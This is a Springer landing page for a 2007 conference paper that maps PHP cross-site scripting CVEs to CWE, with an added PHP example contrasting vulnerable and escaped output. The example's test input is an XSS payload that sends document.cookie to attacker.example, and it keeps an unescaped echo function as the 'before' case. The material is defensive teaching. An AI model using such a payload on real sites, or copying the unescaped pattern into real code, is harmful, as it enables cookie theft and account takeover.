Constructing a “Common Cross Site Scripting Vulnerabilities Enumeration (CXE)” Using CWE and CVE

  • Conference paper
Information Systems Security (ICISS 2007)

Part of the book series: Lecture Notes in Computer Science (LNCS, volume 4812)

Abstract

It has been found that almost 70% of recent attacks on web applications were carried out even though the systems were protected by well-configured firewalls and intrusion detection systems. Advisory sites report that more than 20% of attacks originate from Cross Site Scripting (XSS) vulnerabilities. Our analysis has shown that more than 40% of the vulnerabilities confirmed in Common Vulnerabilities and Exposures (CVE) in 2006 were in PHP scripts, and that 45% of these PHP-based vulnerabilities are classified as XSS. By organizing these errors into a simple taxonomy and mapping CVE entries to the Common Weakness Enumeration (CWE) of the MITRE Corporation, we have constructed a Common XSS Vulnerability Enumeration (CXE). With the help of CXE, security practitioners can recognize the common developer patterns in PHP that lead to coding errors resulting in XSS vulnerabilities, while developers can identify and rectify such errors as they build software.
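The abstract's central claim is that a small number of recurring PHP coding patterns account for most of the XSS entries in CVE. The snippet below is an added illustration written for this page, not code from the paper or from any CVE it analysed. It shows the most common such pattern (request data concatenated straight into HTML) beside a hardened version, and a record in the shape a CXE entry might take. The pattern label `reflected-echo`, the record's field names, the `search_page_*` function names and the constructed payload are assumptions; CWE-79 is the actual CWE identifier for cross-site scripting.

```php
<?php
// Added example (not from the paper): the unescaped-echo developer pattern
// that the abstract singles out as a common source of PHP XSS, beside a
// hardened version. Runs from the CLI with a constructed payload. The
// pattern label "reflected-echo" and the $record layout are assumptions
// modelled on the CXE idea, not the paper's own taxonomy.

declare(strict_types=1);

// Vulnerable pattern: untrusted request data is written straight into HTML.
// This is the error CWE-79 (Improper Neutralization of Input During Web Page
// Generation) describes; it is kept here only as the "before" case.
function search_page_vulnerable(array $get): string
{
    $q = $get['q'] ?? '';
    return "<p>Results for: " . $q . "</p>";
}

// Hardened pattern: encode for the HTML text context at the output point.
// ENT_QUOTES also covers single and double quotes, so the same value is safe
// inside a quoted attribute; ENT_SUBSTITUTE replaces invalid byte sequences
// instead of returning an empty string; the explicit charset stops multi-byte
// sequences from being misread as a closing tag.
function search_page_fixed(array $get): string
{
    $q = (string) ($get['q'] ?? '');
    $safe = htmlspecialchars($q, ENT_QUOTES | ENT_SUBSTITUTE | ENT_HTML5, 'UTF-8');
    return "<p>Results for: " . $safe . "</p>";
}

// Minimal check used by the demo below: does the rendered page still carry
// an executable <script> element taken from the request?
function contains_script_tag(string $html): bool
{
    return (bool) preg_match('/<script\b/i', $html);
}

// Constructed request, standing in for $_GET in a real web context.
$request = [
    'q' => '<script>document.location="http://attacker.example/?c="+document.cookie</script>',
];

$before = search_page_vulnerable($request);
$after  = search_page_fixed($request);

// A CXE-style record tying the developer pattern to its CWE parent. The
// field names are this example's own; CWE-79 is the real CWE identifier.
$record = [
    'pattern' => 'reflected-echo',   // assumed label for the pattern
    'cwe'     => 'CWE-79',
    'sink'    => 'echo / string concatenation into HTML',
    'fix'     => 'htmlspecialchars(..., ENT_QUOTES, "UTF-8") at the output point',
];

printf("vulnerable output : %s\n", $before);
printf("script reflected  : %s\n", contains_script_tag($before) ? 'yes' : 'no');
printf("hardened output   : %s\n", $after);
printf("script reflected  : %s\n", contains_script_tag($after) ? 'yes' : 'no');
printf("CXE record        : %s\n", json_encode($record));
```

Run it with `php cxe_example.php`. The vulnerable branch reflects the payload's `<script>` element verbatim; the hardened branch emits `&lt;script&gt;...&lt;/script&gt;`, which the browser renders as text. Note that `htmlspecialchars` is only correct for the HTML text and quoted-attribute contexts; a value placed inside a `<script>` block, a URL, or a CSS property needs the encoder for that context, which is exactly the kind of distinction a per-pattern enumeration such as CXE is meant to capture.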

Author information

Authors: K. Sivakumar, K. Garg

Editor information

Editors: Patrick McDaniel, Shyam K. Gupta

Copyright information

© 2007 Springer-Verlag Berlin Heidelberg

About this paper

Cite this paper

Sivakumar, K., Garg, K. (2007). Constructing a “Common Cross Site Scripting Vulnerabilities Enumeration (CXE)” Using CWE and CVE. In: McDaniel, P., Gupta, S.K. (eds) Information Systems Security. ICISS 2007. Lecture Notes in Computer Science, vol 4812. Springer, Berlin, Heidelberg. https://doi.org/10.1007/978-3-540-77086-2_25

  • DOI: https://doi.org/10.1007/978-3-540-77086-2_25

  • Publisher Name: Springer, Berlin, Heidelberg

  • Print ISBN: 978-3-540-77085-5

  • Online ISBN: 978-3-540-77086-2
